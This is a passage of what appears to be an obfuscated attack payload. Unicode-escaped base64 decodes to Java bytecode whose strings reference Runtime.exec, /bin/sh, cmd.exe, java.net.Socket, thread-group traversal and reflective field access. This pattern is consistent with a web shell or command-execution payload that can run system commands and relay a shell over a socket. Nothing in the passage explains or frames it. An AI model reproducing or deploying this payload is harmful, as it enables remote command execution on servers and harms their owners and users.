0041\u0057\u006b\u0041\u006b\u0067\u0077\u0042\u0061\u0067\u0043\u0053\u0044\u0041\u0046\u0072\u0041\u0054\u0034\u004d\u0041\u0057\u0077\u0042\u0050\u0067\u0077\u0042\u0062\u0051\u0046\u0075\u0041\u0051\u0041\u0048\u0062\u0033\u004d\u0075\u0062\u006d\u0046\u0074\u005a\u0051\u0063\u0042\u0062\u0077\u0077\u0042\u0063\u0041\u0043\u0062\u0044\u0041\u0046\u0078\u0041\u0054\u0034\u0042\u0041\u0041\u004e\u0033\u0061\u0057\u0034\u0042\u0041\u0041\u0052\u0077\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0043\u004c\u0057\u0034\u0042\u0041\u0042\u0064\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u0067\u0077\u0042\u0063\u0067\u0046\u007a\u0041\u0051\u0041\u0046\u0049\u0043\u0031\u0075\u0049\u0044\u0051\u0042\u0041\u0041\u0049\u0076\u0059\u0077\u0045\u0041\u0042\u0053\u0041\u0074\u0064\u0043\u0041\u0030\u0041\u0051\u0041\u0043\u0063\u0032\u0067\u0042\u0041\u0041\u0049\u0074\u0059\u0077\u0063\u0042\u0064\u0041\u0077\u0042\u0064\u0051\u0046\u0032\u0044\u0041\u0043\u0066\u0041\u0058\u0063\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0033\u0056\u0030\u0061\u0057\u0077\u0076\u0055\u0032\u004e\u0068\u0062\u006d\u0035\u006c\u0063\u0067\u0063\u0042\u0065\u0041\u0077\u0042\u0065\u0051\u0046\u0036\u0044\u0041\u0043\u0052\u0041\u0058\u0073\u0042\u0041\u0041\u004a\u0063\u0059\u0051\u0077\u0042\u0066\u0041\u0046\u0039\u0044\u0041\u0046\u0048\u0041\u0054\u0034\u004d\u0041\u0058\u0034\u0042\u0065\u0067\u0077\u0042\u0066\u0077\u0043\u0053\u0041\u0051\u0041\u0048\u004c\u0032\u004a\u0070\u0062\u0069\u0039\u007a\u0061\u0041\u0045\u0041\u0042\u0032\u004e\u0074\u005a\u0043\u0035\u006c\u0065\u0047\u0055\u004d\u0041\u004a\u0038\u0042\u0067\u0041\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u006d\u0056\u0030\u004c\u0031\u004e\u0076\u0059\u0032\u0074\u006c\u0064\u0041\u0077\u0041\u006b\u0051\u0043\u0068\u0044\u0041\u0047\u0042\u0041\u0059\u0049\u004d\u0041\u0059\u004d\u0042\u0052\u0067\u0063\u0042\u0068\u0041\u0077\u0042\u0068\u0051\u0047\u0047\u0044\u0041\u0047\u0048\u0041\u0059\u0059\u0048\u0041\u0059\u0067\u004d\u0041\u004a\u0077\u0042\u0069\u0051\u0077\u0042\u0069\u0067\u0047\u004c\u0044\u0041\u0047\u004d\u0041\u0059\u0059\u004d\u0041\u0059\u0030\u0042\u0050\u0067\u0077\u0042\u006a\u0067\u0047\u0047\u0044\u0041\u0043\u0067\u0041\u004b\u0045\u0042\u0041\u0042\u005a\u007a\u0064\u0057\u0034\u0075\u0062\u0057\u006c\u007a\u0059\u0079\u0035\u0043\u0051\u0056\u004e\u0046\u004e\u006a\u0052\u0045\u005a\u0057\u004e\u0076\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u004d\u005a\u0047\u0056\u006a\u0062\u0032\u0052\u006c\u0051\u006e\u0056\u006d\u005a\u006d\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0031\u0064\u0047\u006c\u0073\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0052\u006c\u0059\u0032\u0039\u006b\u005a\u0058\u0049\u0042\u0041\u0043\u005a\u0076\u0063\u006d\u0063\u0075\u0059\u0058\u0042\u0068\u0059\u0032\u0068\u006c\u004c\u006d\u004e\u0076\u0062\u0057\u0031\u0076\u0062\u006e\u004d\u0075\u0059\u0032\u0039\u006b\u005a\u0057\u004d\u0075\u0059\u006d\u006c\u0075\u0059\u0058\u004a\u0035\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0041\u006b\u0045\u0030\u0041\u0051\u0041\u004e\u0059\u0033\u0056\u0079\u0063\u006d\u0056\u0075\u0064\u0046\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0043\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0042\u0041\u0042\u006b\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0042\u0041\u0042\u004d\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0051\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u0047\u0061\u0057\u0056\u0073\u005a\u0041\u0045\u0041\u004c\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u004f\u0077\u0045\u0041\u0046\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u0041\u0051\u0041\u004e\u0063\u0032\u0056\u0030\u0051\u0057\u004e\u006a\u005a\u0058\u004e\u007a\u0061\u0057\u004a\u0073\u005a\u0051\u0045\u0041\u0042\u0043\u0068\u0061\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u006e\u005a\u0058\u0051\u0042\u0041\u0043\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0077\u0045\u0041\u0042\u0032\u0064\u006c\u0064\u0045\u0035\u0068\u0062\u0057\u0055\u0042\u0041\u0042\u0051\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u0047\u004e\u0076\u0062\u006e\u0052\u0068\u0061\u0057\u0035\u007a\u0041\u0051\u0041\u0062\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0068\u0068\u0063\u006c\u004e\u006c\u0063\u0058\u0056\u006c\u0062\u006d\u004e\u006c\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u004e\u005a\u0032\u0056\u0030\u0055\u0033\u0056\u0077\u005a\u0058\u004a\u006a\u0062\u0047\u0046\u007a\u0063\u0077\u0045\u0041\u0043\u0047\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u0041\u0051\u0041\u0057\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u004f\u0077\u0045\u0041\u0045\u006d\u0070\u0068\u0064\u006d\u0045\u0076\u0064\u0058\u0052\u0070\u0062\u0043\u0039\u004a\u0064\u0047\u0056\u0079\u0059\u0058\u0052\u0076\u0063\u0067\u0045\u0041\u0042\u0032\u0068\u0068\u0063\u0030\u0035\u006c\u0065\u0048\u0051\u0042\u0041\u0041\u004d\u006f\u004b\u0056\u006f\u0042\u0041\u0041\u0052\u0075\u005a\u0058\u0068\u0030\u0041\u0051\u0041\u0055\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0042\u0041\u0041\u006c\u006e\u005a\u0058\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0045\u0041\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0063\u006d\u0056\u006d\u0062\u0047\u0056\u006a\u0064\u0043\u0039\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0037\u0041\u0051\u0041\u0059\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0033\u004a\u006c\u005a\u006d\u0078\u006c\u0059\u0033\u0051\u0076\u0054\u0057\u0056\u0030\u0061\u0047\u0039\u006b\u0041\u0051\u0041\u0047\u0061\u0057\u0035\u0032\u0062\u0032\u0074\u006c\u0041\u0051\u0041\u0035\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0031\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u006e\u006c\u0030\u005a\u0058\u004d\u0042\u0041\u0041\u0051\u006f\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u006c\u0075\u0064\u0047\u0056\u006e\u005a\u0058\u0049\u0042\u0041\u0041\u0052\u0055\u0057\u0056\u0042\u0046\u0041\u0051\u0041\u0052\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0073\u0042\u0041\u0041\u0064\u0032\u0059\u0057\u0078\u0031\u005a\u0055\u0039\u006d\u0041\u0051\u0041\u0057\u004b\u0045\u006b\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0043\u0032\u0035\u006c\u0064\u0030\u006c\u0075\u0063\u0033\u0052\u0068\u0062\u006d\u004e\u006c\u0041\u0051\u0041\u0052\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0041\u0064\u006d\u0062\u0033\u004a\u004f\u0059\u0057\u0031\u006c\u0041\u0051\u0041\u0056\u005a\u0032\u0056\u0030\u0051\u0032\u0039\u0075\u0064\u0047\u0056\u0034\u0064\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u005a\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u004f\u0077\u0045\u0041\u0046\u0057\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0078\u0076\u0059\u0057\u0052\u006c\u0063\u0067\u0045\u0041\u0042\u006d\u0056\u0078\u0064\u0057\u0046\u0073\u0063\u0077\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0057\u0067\u0045\u0041\u0042\u0048\u0052\u0079\u0061\u0057\u0030\u0042\u0041\u0041\u0070\u007a\u0064\u0047\u0046\u0079\u0064\u0048\u004e\u0058\u0061\u0058\u0052\u006f\u0041\u0051\u0041\u0056\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u0046\u0063\u0033\u0042\u0073\u0061\u0058\u0051\u0042\u0041\u0043\u0063\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0068\u0077\u0059\u0058\u004a\u007a\u005a\u0055\u006c\u0075\u0064\u0041\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0053\u0051\u0045\u0041\u0046\u0079\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004a\u0031\u0062\u006d\u0035\u0068\u0059\u006d\u0078\u006c\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u0046\u0063\u0033\u0052\u0068\u0063\u006e\u0051\u0042\u0041\u0042\u0055\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0059\u0042\u0041\u0042\u0045\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0052\u006d\u006c\u0073\u005a\u0054\u0073\u0070\u0056\u0067\u0045\u0041\u0042\u0053\u0068\u0062\u0051\u0069\u006c\u0057\u0041\u0051\u0041\u0046\u005a\u006d\u0078\u0031\u0063\u0032\u0067\u0042\u0041\u0041\u0056\u006a\u0062\u0047\u0039\u007a\u005a\u0051\u0045\u0041\u0043\u0048\u0052\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0051\u0057\u004a\u007a\u0062\u0032\u0078\u0031\u0064\u0047\u0056\u0051\u0059\u0058\u0052\u006f\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0077\u0062\u0047\u0046\u006a\u005a\u0051\u0045\u0041\u0052\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0035\u0063\u0033\u0052\u006c\u0062\u0051\u0045\u0041\u0043\u0032\u0064\u006c\u0064\u0046\u0042\u0079\u0062\u0033\u0042\u006c\u0063\u006e\u0052\u0035\u0041\u0051\u0041\u004c\u0064\u0047\u0039\u004d\u0062\u0033\u0064\u006c\u0063\u006b\u004e\u0068\u0063\u0032\u0055\u0042\u0041\u0041\u005a\u0068\u0063\u0048\u0042\u006c\u0062\u006d\u0051\u0042\u0041\u0043\u0030\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u006a\u0073\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0046\u004a\u0031\u0062\u006e\u0052\u0070\u0062\u0057\u0055\u0042\u0041\u0042\u0055\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0054\u0073\u0042\u0041\u0043\u0067\u006f\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0042\u0041\u0041\u0035\u006e\u005a\u0058\u0052\u004a\u0062\u006e\u0042\u0031\u0064\u0046\u004e\u0030\u0063\u006d\u0056\u0068\u0062\u0051\u0045\u0041\u0046\u0079\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0053\u0057\u0035\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0059\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u004d\u0064\u0058\u004e\u006c\u0052\u0047\u0056\u0073\u0061\u0057\u0031\u0070\u0064\u0047\u0056\u0079\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0031\u004e\u006a\u0059\u0057\u0035\u0075\u005a\u0058\u0049\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0052\u0058\u004a\u0079\u0062\u0033\u004a\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0042\u0041\u0041\u0064\u006b\u005a\u0058\u004e\u0030\u0063\u006d\u0039\u0035\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0059\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0049\u0061\u0058\u004e\u0044\u0062\u0047\u0039\u007a\u005a\u0057\u0051\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u004a\u0059\u0058\u005a\u0068\u0061\u0057\u0078\u0068\u0059\u006d\u0078\u006c\u0041\u0051\u0041\u0044\u004b\u0043\u006c\u004a\u0041\u0051\u0041\u0045\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0045\u004b\u0045\u006b\u0070\u0056\u0067\u0045\u0041\u0042\u0058\u004e\u0073\u005a\u0057\u0056\u0077\u0041\u0051\u0041\u0045\u004b\u0045\u006f\u0070\u0056\u0067\u0045\u0041\u0043\u0057\u0056\u0034\u0061\u0058\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0031\u006c\u0063\u0033\u004e\u0068\u005a\u0032\u0055\u0042\u0041\u0041\u0068\u0070\u0062\u006e\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0041\u0068\u0041\u0049\u0077\u0041\u0048\u0067\u0041\u0042\u0041\u0041\u0038\u0041\u0041\u0067\u0041\u0043\u0041\u0049\u0030\u0041\u006a\u0067\u0041\u0041\u0041\u0041\u0049\u0041\u006a\u0077\u0043\u0051\u0041\u0041\u0041\u0041\u0043\u0051\u0041\u0042\u0041\u004a\u0045\u0041\u006b\u0067\u0041\u0043\u0041\u004a\u004d\u0041\u0041\u0041\u004f\u0032\u0041\u0041\u0059\u0041\u0045\u0077\u0041\u0041\u0041\u006f\u0034\u0071\u0074\u0077\u0041\u0042\u0075\u0041\u0041\u0043\u0074\u0067\u0041\u0044\u0054\u0043\u0075\u0032\u0041\u0041\u0051\u0053\u0042\u0062\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u0072\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u004a\u0077\u0041\u0041\u004a\u0054\u0069\u0030\u0036\u0042\u0042\u006b\u0045\u0076\u006a\u0059\u0046\u0041\u007a\u0059\u0047\u0046\u0051\u0059\u0056\u0042\u0061\u0049\u0043\u0057\u0042\u006b\u0045\u0046\u0051\u0059\u0079\u004f\u0067\u0063\u005a\u0042\u0038\u0063\u0041\u0042\u0071\u0063\u0043\u0051\u0078\u006b\u0048\u0074\u0067\u0041\u004b\u004f\u0067\u0067\u005a\u0043\u0042\u0049\u004c\u0074\u0067\u0041\u004d\u006d\u0067\u0041\u004e\u0047\u0051\u0067\u0053\u0044\u0062\u0059\u0041\u0044\u004a\u006f\u0041\u0042\u0071\u0063\u0043\u004a\u0052\u006b\u0048\u0074\u0067\u0041\u0045\u0045\u0067\u0036\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u0065\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0077\u0051\u0041\u0050\u006d\u0067\u0041\u0047\u0070\u0077\u0049\u0043\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u004c\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0043\u0062\u0059\u0041\u0043\u0044\u006f\u004a\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u0062\u0059\u0041\u0042\u006b\u0032\u006e\u0041\u0042\u0059\u0036\u0043\u0068\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0074\u0067\u0041\u0054\u0045\u0068\u0047\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u006d\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0045\u0068\u0053\u0032\u0041\u0041\u005a\u004e\u0070\u0077\u0041\u0051\u004f\u0067\u006f\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0055\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u004f\u0067\u006b\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0056\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u0057\u0077\u0041\u0041\u0057\u004f\u0067\u006f\u005a\u0043\u0072\u006b\u0041\u0046\u0077\u0045\u0041\u004f\u0067\u0073\u005a\u0043\u0037\u006b\u0041\u0047\u0041\u0045\u0041\u006d\u0051\u0046\u0062\u0047\u0051\u0075\u0035\u0041\u0042\u006b\u0042\u0041\u0044\u006f\u004d\u0047\u0051\u0079\u0032\u0041\u0041\u0051\u0053\u0047\u0072\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0044\u004c\u0059\u0041\u0043\u0044\u006f\u004e\u0047\u0051\u0032\u0032\u0041\u0041\u0051\u0053\u0047\u0077\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u004f\u0039\u0041\u0042\u0036\u0032\u0041\u0042\u0038\u0036\u0044\u0068\u006b\u004e\u0074\u0067\u0041\u0045\u0045\u0069\u0041\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u0049\u0069\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u0049\u0054\u006f\u0050\u0047\u0051\u002f\u0048\u0041\u0041\u0061\u006e\u002f\u0035\u0045\u0071\u0047\u0051\u002b\u0032\u0041\u0043\u004f\u0032\u0041\u0043\u0051\u0036\u0045\u0042\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0055\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004f\u0079\u0041\u0043\u005a\u0054\u0074\u0067\u0041\u0064\u0047\u0051\u0034\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0052\u0041\u004d\u0069\u0034\u0041\u0043\u0064\u0054\u0074\u0067\u0041\u0066\u0056\u0079\u006f\u0053\u004b\u004c\u0059\u0041\u004b\u0054\u006f\u0052\u0047\u0052\u0047\u0032\u0041\u0043\u006f\u0036\u0043\u0052\u006b\u0052\u0045\u0069\u0073\u0047\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u004c\u0046\u004e\u005a\u0042\u004c\u0049\u0041\u004a\u006c\u004e\u005a\u0042\u0062\u0049\u0041\u004a\u006c\u004f\u0032\u0041\u0043\u